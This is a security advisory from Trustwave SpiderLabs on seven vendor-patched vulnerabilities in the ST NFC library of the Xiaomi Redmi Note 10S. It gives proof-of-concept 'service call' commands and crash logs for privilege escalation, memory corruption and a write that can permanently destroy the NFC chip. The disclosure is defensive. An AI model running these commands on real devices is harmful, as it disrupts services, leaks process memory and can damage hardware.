Trustwave SpiderLabs Security Advisory TWSL2023-007: Vulnerabilities in Xiaomi Redmi Note 10S and ST54-android-packages-apps-Nfc library Published: 12/22/2023 Version: 1.0 Vendors: Xiaomi Redmi and ST Microelectronics Product: Xiaomi Redmi Note 10S Version affected: <= MIUI 13.0.5 Stable Product description: The Android-based smartphone. *****Credit: Maksymilian Motyl of Trustwave Finding 1: Privilege escalation It’s been established that any application can exchange all exported IPC calls with the nfc.st_ext service without the need to acquire android.permission.WRITE_SECURE_SETTINGS privilege or even android.permission.NFC. The issue is a misconfiguration of the MIUI system on the Xiaomi Redmi Note 10S. Evidence #1: The following commands have been executed: rosemary:/ $ service call nfc.st_ext 17 i32 6 i32 1 # connectGate Result: Parcel(00000000 000000ff '........') rosemary:/ $ service call nfc.st_ext 18 i32 6 i32 2 s16 AA # transceive Result: Parcel(00000000 00000000 '........') rosemary:/ $ service call nfc.st_ext 19 i32 6 i32 1 # disconnectGate This resulted in the following output in the logcat logs: 01-31 14:50:35.533 29259 29273 I NfcService: connectGate() - host_id = 6 - gate_id = 1 01-31 14:50:35.533 581 581 D StNfcHal: HAL st21nfc: StNfc_hal_write 01-31 14:50:35.534 581 29290 D StNfcHal: (#00047) Tx 01 00 03 (hidden) 01-31 14:50:35.534 581 29291 W StNfcHal: ! i2cWrite!!, errno is 'I/O error' 01-31 14:50:35.540 581 29291 D StNfcHal: (#00048) Rx 01 00 04 (hidden) 01-31 14:50:35.541 581 29291 D StNfcHal: (#00049) Rx 60 06 03 01 01 01 01-31 14:50:48.981 29259 29273 I NfcService: transceive() - pipe_id = 6 - HCI cmd = 2 01-31 14:51:33.781 29259 29312 I NfcService: disconnectGate() - pipe_id = 6 Evidence #2: incorrect execution of the com.android.nfc.NfcService.programHceParameters function can disconnect other applications from the NFC resulting in service disruption. rosemary:/ $ service call nfc.st_ext 34 Result: Parcel(00000000 '....') Finding 2: NfcStExtensions::getProprietaryConfigSettings Out-Of-Bound Memory Read CVE: CVE-2023-36629 The NFC library (https://github.com/STMicroelectronics/ST54-android-packages-apps-Nfc/) shared by STMicroelectroincs is vulnerable to out-of-bound memory read that allows unprivileged process to read the com.android.nfc process runtime memory. Evidence #1. The below command has been executed as an ADB shell user. The values 4702394925722257289 and 4774451407313060418 represent the hex values: 0x4142434545464789 and 0x4242424242424242. rosemary:/ $ service call nfc.st_ext 9 i64 4702394925722257289 i64 4774451407313060418 Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe") Results from the ADB Logcat output after the command execution. The registers x19 and x20 are controlled by the attacker. The x8 register value proves the crash location shown in the next listing. The crash has occurred on a memory address 0x7c329d9f64 (x8 + 0x8a7): 10-05 19:53:01.216 21411 21411 E DEBUG : failed to read /proc/uptime: Permission denied 10-05 19:53:01.473 21411 21411 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 10-05 19:53:01.473 21411 21411 F DEBUG : Build fingerprint: 'Redmi/rosemary_eea/rosemary:12/SP1A.210812.016/V13.0.3.0.SKLEUOR:user/release-keys' 10-05 19:53:01.473 21411 21411 F DEBUG : Revision: '0' 10-05 19:53:01.473 21411 21411 F DEBUG : ABI: 'arm64' 10-05 19:53:01.473 21411 21411 F DEBUG : Timestamp: 2022-10-05 19:53:01.214973507+0200 10-05 19:53:01.473 21411 21411 F DEBUG : Process uptime: 0s 10-05 19:53:01.473 21411 21411 F DEBUG : Cmdline: com.android.nfc 10-05 19:53:01.473 21411 21411 F DEBUG : pid: 21109, tid: 21124, name: Binder:21109_2 >>> com.android.nfc <<< 10-05 19:53:01.473 21411 21411 F DEBUG : uid: 1027 10-05 19:53:01.473 21411 21411 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x7c329d9f64 10-05 19:53:01.473 21411 21411 F DEBUG : x0 0000007bf15b5690 x1 0000000000000000 x2 0000000000000000 x3 0000000000000000 10-05 19:53:01.473 21411 21411 F DEBUG : x4 0000000000000000 x5 00000000ffffffff x6 00000000ffffffff x7 0000000000018900 10-05 19:53:01.473 21411 21411 F DEBUG : x8 0000007c329d96bd x9 8d9fd1788a2fdf29 x10 0000000000000000 x11 0000000000000000 10-05 19:53:01.474 21411 21411 F DEBUG : x12 000000000003ea1c x13 000000000003ea1a x14 0000000000000028 x15 0000000000000027 10-05 19:53:01.474 21411 21411 F DEBUG : x16 0000007c90f4ec40 x17 0000007c90f3e930 x18 0000007b83940000 x19 0000000042424242 10-05 19:53:01.474 21411 21411 F DEBUG : x20 0000000041424345 x21 0000007bf15b5378 x22 0000007bf15b5690 x23 0000000000000000 10-05 19:53:01.474 21411 21411 F DEBUG : x24 0000007bf15b6f70 x25 0000007bf19f4000 x26 0000007bf19f3078 x27 0000007bf19f3058 10-05 19:53:01.474 21411 21411 F DEBUG : x28 0000007bf19f30a0 x29 0000007bf19f2d90 10-05 19:53:01.474 21411 21411 F DEBUG : lr 0000007bf156f8a0 sp 0000007bf19f2c40 pc 0000007bf156f8ac pst 0000000060001000 10-05 19:53:01.474 21411 21411 F DEBUG : backtrace Finding 3: NfcStExtensions::setProprietaryConfigSettings Out-Of-Bound Write and Hardware Damage Executing the setProprietaryConfigSettings via the service call can allow writing a bit into the chosen memory address. Incorrect execution of the function will irreversibly destroy the smartphone's NFC chip. Evidence #1. Source code snippet of the function NfcStExtensions::setProprietaryConfigSettings. The byteNb argument is used as an index without sanitization. void NfcStExtensions::setProprietaryConfigSettings(int prop_config_id, int byteNb, int bitNb, bool status) { static const char fn[] = "NfcStExtensions::setProprietaryConfigSettings"; LOG_IF(INFO, nfc_debug_enabled) << StringPrintf("%s; Current value: 0x%x", fn, mPropConfig.config[byteNb]); if (status == true) { setPropConfig[byteNb + 6] = mPropConfig.config[byteNb] | ((0x1 << bitNb)); LOG_IF(INFO, nfc_debug_enabled) << StringPrintf( "%s; Requested Value: 0x%x", fn, setPropConfig[byteNb + 6]); } else { setPropConfig[byteNb + 6] = mPropConfig.config[byteNb] & ~(0x1 << bitNb); LOG_IF(INFO, nfc_debug_enabled) << StringPrintf( "%s; Requested Value: 0x%x", fn, setPropConfig[byteNb + 6]); } Finding 4: nativeNfcStExtensions_getRfConfiguration Type-Confusion The function nativeNfcStExtensions_getRfConfiguration takes as an argument the value of the type jbyteArray, however, it is possible to provide other types of data as this argument. Evidence #1. The below command has been executed as an ADB shell user: rosemary:/ $ service call nfc.st_ext 7 i64 -2000000000 The service crash has been intercepted: 02-27 18:34:17.201 11495 11495 F DEBUG : signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr -------- 02-27 18:34:17.201 11495 11495 F DEBUG : Abort message: 'JNI DETECTED ERROR IN APPLICATION: java_array == null 02-27 18:34:17.201 11495 11495 F DEBUG : in call to SetPrimitiveArrayRegion 02-27 18:34:17.201 11495 11495 F DEBUG : from int com.android.nfc.dhimpl.NativeNfcStExtensions.getRfConfiguration(byte[])' 02-27 18:34:17.201 11495 11495 F DEBUG : x0 0000000000000000 x1 0000000000002c82 x2 0000000000000006 x3 0000006f6d7ef9b0 02-27 18:34:17.201 11495 11495 F DEBUG : x4 0000007023f33000 x5 0000007023f33000 x6 0000007023f33000 x7 0000000000045ee4 02-27 18:34:17.201 11495 11495 F DEBUG : x8 00000000000000f0 x9 0000007013640018 x10 ffffff00fffffbdf x11 0000000000000001 02-27 18:34:17.201 11495 11495 F DEBUG : x12 0000000000000000 x13 000000000112cd30 x14 0000006f6d7ee7c0 x15 00001d45b09d9157 02-27 18:34:17.201 11495 11495 F DEBUG : x16 0000007013715d20 x17 00000070136efe20 x18 0000006f0ae8a000 x19 00000000000000ac 02-27 18:34:17.201 11495 11495 F DEBUG : x20 0000000000002c75 x21 00000000000000b2 x22 0000000000002c82 x23 00000000ffffffff 02-27 18:34:17.201 11495 11495 F DEBUG : x24 0000006f6d7efb98 x25 0000006f6d7f1000 x26 0000006f6d7f1000 x27 0000006f6d7f0080 02-27 18:34:17.201 11495 11495 F DEBUG : x28 0000006f6d7f00a0 x29 0000006f6d7efa30 02-27 18:34:17.201 11495 11495 F DEBUG : lr 00000070136a15bc sp 0000006f6d7ef990 pc 00000070136a15ec pst 0000000000001000 02-27 18:34:17.201 11495 11495 F DEBUG : backtrace: 02-27 18:34:17.201 11495 11495 F DEBUG : #00 pc 00000000000895ec /apex/com.android.runtime/lib64/bionic/libc.so (abort+180) (BuildId: 8607e22d19978fe368fdf8f39b0835df) 02-27 18:34:17.201 11495 11495 F DEBUG : #01 pc 00000000006d19dc /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+704) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 02-27 18:34:17.201 11495 11495 F DEBUG : #02 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86) 02-27 18:34:17.201 11495 11495 F DEBUG : #03 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86) 02-27 18:34:17.201 11495 11495 F DEBUG : #04 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 02-27 18:34:17.201 11495 11495 F DEBUG : #05 pc 000000000062f754 /apex/com.android.art/lib64/libart.so (art::JNI::SetByteArrayRegion(_JNIEnv*, _jbyteArray*, int, int, signed char const*)+768) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 02-27 18:34:17.201 11495 11495 F DEBUG : #06 pc 000000000002376c /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_getRfConfiguration(_JNIEnv*, _jobject*, _jbyteArray*)+268) (BuildId: 8fac3d320749ecb75c84701bf4d9bb09) 02-27 18:34:17.201 11495 11495 F DEBUG : #07 pc 000000000000a870 /data/dalvik-cache/arm64/system@system_ext@app@Nfc_st@Nfc_st.apk@classes.dex (art_jni_trampoline+128) Finding 5: nativeNfcStExtensions_transceiveEE / nativeNfcStExtensions_transceive GetArrayLength Type Confusion The service calls handlers nativeNfcStExtensions_transceiveEE and nativeNfcStExtensions_transceive lack the type checks and control of input provided as function arguments by a user via the IPC calls. Evidence #1. The following command invoking the transceiveEE(int param1Int, byte[] param1ArrayOfbyte) has been executed: rosemary:/ $ service call nfc.st_ext 15 i32 8 i32 17 Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe") The above IPC call resulted in logging the following memory corruption: 01-31 17:42:58.138 8468 8468 D ProcessState: Binder ioctl to enable oneway spam detection failed: Invalid argument 01-31 17:42:58.142 8382 8396 I NfcService: transceiveEE() - ceeId = 8 01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594] JNI DETECTED ERROR IN APPLICATION: java_array == null 01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594] in call to GetArrayLength 01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594] from byte[] com.android.nfc.dhimpl.NativeNfcStExtensions.transceiveEE(int, byte[]) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] Runtime aborting... 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #00 pc 0000000000535c24 /apex/com.android.art/lib64/libart.so (art::DumpNativeStack(std::__1::basic_ostream >&, int, BacktraceMap*, char const*, art::ArtMethod*, void*, bool)+128) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #01 pc 00000000006efd94 /apex/com.android.art/lib64/libart.so (art::Thread::DumpStack(std::__1::basic_ostream >&, bool, BacktraceMap*, bool) const+236) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #02 pc 00000000006fd620 /apex/com.android.art/lib64/libart.so (art::DumpCheckpoint::Run(art::Thread*)+208) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #03 pc 0000000000362a60 /apex/com.android.art/lib64/libart.so (art::ThreadList::RunCheckpoint(art::Closure*, art::Closure*)+440) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #04 pc 00000000006fbdc0 /apex/com.android.art/lib64/libart.so (art::ThreadList::Dump(std::__1::basic_ostream >&, bool)+280) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #05 pc 00000000006d6e28 /apex/com.android.art/lib64/libart.so (art::AbortState::Dump(std::__1::basic_ostream >&) const+212) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #06 pc 00000000006d1b14 /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+1016) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #07 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #08 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #09 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #10 pc 00000000006283e4 /apex/com.android.art/lib64/libart.so (art::JNI::GetArrayLength(_JNIEnv*, _jarray*)+556) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] native: #11 pc 0000000000024d24 /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_transceiveEE(_JNIEnv*, _jobject*, int, _jbyteArray*)+396) (BuildId: a48e883d65c1a11933117a7a98a39720) Evidence #2. The identical bug is located inside the transceive method. The below PoC will trigger an issue in the nativeNfcStExtensions_transceive function. rosemary:/ $ service call nfc.st_ext 18 i32 8 i32 8 i32 -1 Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe") Finding 6: nativeNfcStExtensions_getAvailableHciHostList Out-Of-Bound Write Evidence #1. The below command was executed, invoking a call to the public native int getAvailableHciHostList(byte[] paramArrayOfbyte1, byte[] paramArrayOfbyte2): rosemary:/ $ service call nfc.st_ext 20 i32 4294967295 s16 AAAA Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe") The call resulted in the following crash intercepted by the logcat: 01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594] JNI DETECTED ERROR IN APPLICATION: java_array == null 01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594] in call to SetPrimitiveArrayRegion 01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594] from int com.android.nfc.dhimpl.NativeNfcStExtensions.getAvailableHciHostList(byte[], byte[]) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] Runtime aborting... >&, int, BacktraceMap*, char const*, art::ArtMethod*, void*, bool)+128) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #01 pc 00000000006efd94 /apex/com.android.art/lib64/libart.so (art::Thread::DumpStack(std::__1::basic_ostream >&, bool, BacktraceMap*, bool) const+236) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #02 pc 00000000006fd620 /apex/com.android.art/lib64/libart.so (art::DumpCheckpoint::Run(art::Thread*)+208) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #03 pc 0000000000362a60 /apex/com.android.art/lib64/libart.so (art::ThreadList::RunCheckpoint(art::Closure*, art::Closure*)+440) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #04 pc 00000000006fbdc0 /apex/com.android.art/lib64/libart.so (art::ThreadList::Dump(std::__1::basic_ostream >&, bool)+280) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #05 pc 00000000006d6e28 /apex/com.android.art/lib64/libart.so (art::AbortState::Dump(std::__1::basic_ostream >&) const+212) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #06 pc 00000000006d1b14 /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+1016) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #07 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #08 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #09 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #10 pc 000000000062f754 /apex/com.android.art/lib64/libart.so (art::JNI::SetByteArrayRegion(_JNIEnv*, _jbyteArray*, int, int, signed char const*)+768) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #11 pc 00000000000259dc /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_getAvailableHciHostList(_JNIEnv*, _jobject*, _jbyteArray*, _jbyteArray*)+468) (BuildId: a48e883d65c1a11933117a7a98a39720) 01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] native: #12 pc 000000000000a510 /data/dalvik- Finding 7: Null Pointer at NfcStExtensions::setRfConfiguration Evidence #1. The below service call results in the null pointer exception. rosemary:/ $ service call nfc.st_ext 6 i64 -8 Result: Parcel(Error:0xffffffffffffffe0 "Broken pipe") The Logcat output: 10-05 17:19:36.395 2944 2997 I NfcService: setRfConfiguration() - modeBitmap-8 10-05 17:19:36.396 2944 2970 E libnfc_nci: [ERROR:nfa_ce_act.cc(1500)] nfa_ce_api_dereg_listen - cannot find listen_info for Felica/T4tAID 10-05 17:19:36.397 2944 2997 F libc : Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 2997 (Binder:2944_6), pid 2944(com.android.nfc) 10-05 17:19:36.495 24534 24534 I crash_dump64: obtaining output fd from tombstoned, type: kDebuggerdTombstoneProto 10-05 17:19:36.502 644 644 I tombstoned: received crash request for pid 2997 10-05 17:19:36.504 24534 24534 I crash_dump64: performing dump of process 2944 (target tid = 2997) 10-05 17:19:36.532 24534 24534 E DEBUG : failed to read /proc/uptime: Permission denied 10-05 17:19:36.935 24534 24534 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 10-05 17:19:36.935 24534 24534 F DEBUG : Build fingerprint: 'Redmi/rosemary_eea/rosemary:12/SP1A.210812.016/V13.0.3.0.SKLEUOR:user/release-keys' 10-05 17:19:36.935 24534 24534 F DEBUG : Revision: '0' 10-05 17:19:36.935 24534 24534 F DEBUG : ABI: 'arm64' 10-05 17:19:36.935 24534 24534 F DEBUG : Timestamp: 2022-10-05 17:19:36.527790824+0200 10-05 17:19:36.935 24534 24534 F DEBUG : Process uptime: 0s 10-05 17:19:36.935 24534 24534 F DEBUG : Cmdline: com.android.nfc 10-05 17:19:36.935 24534 24534 F DEBUG : pid: 2944, tid: 2997, name: Binder:2944_6 >>> com.android.nfc <<< 10-05 17:19:36.935 24534 24534 F DEBUG : uid: 1027 10-05 17:19:36.935 24534 24534 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 10-05 17:19:36.935 24534 24534 F DEBUG : Cause: null pointer dereference 10-05 17:19:36.935 24534 24534 F DEBUG : x0 0000000000000000 x1 0000000000000000 x2 0000000000000000 x3 0000000000000000 10-05 17:19:36.935 24534 24534 F DEBUG : x4 0000000000000000 x5 00000000ffffffff x6 00000000ffffffff x7 0000000000000000 10-05 17:19:36.935 24534 24534 F DEBUG : x8 e6dbae821ded0471 x9 0000000000000000 x10 0000000000004001 x11 0000000000000000 10-05 17:19:36.935 24534 24534 F DEBUG : x12 000000000003ea1c x13 000000000003ea1a x14 0000000000000028 x15 0000000000000027 10-05 17:19:36.935 24534 24534 F DEBUG : x16 00000074edaf3d48 x17 0000007608bcfe80 x18 00000074dd3ba000 x19 00000074e4493c31 10-05 17:19:36.935 24534 24534 F DEBUG : x20 00000000fffffff8 x21 0000000000000000 x22 0000000000000000 x23 00000074edaf6b0c 10-05 17:19:36.935 24534 24534 F DEBUG : x24 0000000000000000 x25 00000074edaf6c11 x26 00000074edaf7f74 x27 00000074edaf6378 10-05 17:19:36.935 24534 24534 F DEBUG : x28 00000074edaf7f70 x29 00000074e4493d90 10-05 17:19:36.935 24534 24534 F DEBUG : lr 00000074edaaee70 sp 00000074e4493c10 pc 00000074edaae028 pst 0000000060001000 10-05 17:19:36.935 24534 24534 F DEBUG : backtrace: 10-05 17:19:36.935 24534 24534 F DEBUG : #00 pc 000000000002d028 /system/system_ext/lib64/libstnfc_nci_jni.so (NfcStExtensions::setRfConfiguration(int, unsigned char*)+592) (BuildId: a48e883d65c1a11933117a7a98a39720) 10-05 17:19:36.935 24534 24534 F DEBUG : #01 pc 00000000000235fc /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_setRfConfiguration(_JNIEnv*, _jobject*, int, _jbyteArray*)+364) (BuildId: a48e883d65c1a11933117a7a98a39720) 10-05 17:19:36.935 24534 24534 F DEBUG : #02 pc 0000000000017754 /data/dalvik-cache/arm64/system@system_ext@app@Nfc_st@Nfc_st.apk@classes.dex (art_jni_trampoline+132) Vendor Response: Patched in github Remediation Steps: Make sure you have the most up-to-date security patches installed for your Android device Revision History: 03/03/2023 - Vulnerability disclosed 04/12/2023 - Confirmed by vendor 05/02/2023 - 09/20/2023 - Patches for Findings 1-7 worked on 09/26/2023 - Final patch released by vendor 12/22/2023 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.